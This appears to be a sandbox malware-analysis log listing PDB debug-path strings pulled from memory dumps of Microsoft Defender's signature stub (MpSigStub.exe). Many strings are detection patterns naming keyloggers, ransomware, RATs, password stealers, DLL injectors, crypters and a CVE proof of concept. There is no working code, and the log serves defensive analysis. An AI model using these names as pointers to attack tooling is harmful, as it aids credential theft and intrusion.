Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: sfix\Release\sfix.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: \[Release.Win32]Clicker.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: hmld1\Release\hmld1.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp
Source: Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp
Source: Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
Source: Binary string: Users\Legion\source\repos\curl\Release\curl.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9D:\BuildScript.NET\c2patchdx11\pc\Build\Bin32\Crysis2.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: BugTrap.pdb] source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.18283012261.0000015B1BB87000.00000004.00000001.sdmp
Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.18299991338.0000015B1C3DD000.00000004.00000001.sdmp
Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: 4\ValhallaCrypter\ValhallaStub\Debug\ValhallaStub.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp
Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb source: tKZVPq.exe
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.18307074601.0000015B1AA4C000.00000004.00000001.sdmp
Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.18319810399.0000015B1BE00000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp
Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: Z:\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy\(Winlogon_Shell\)\\.*.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
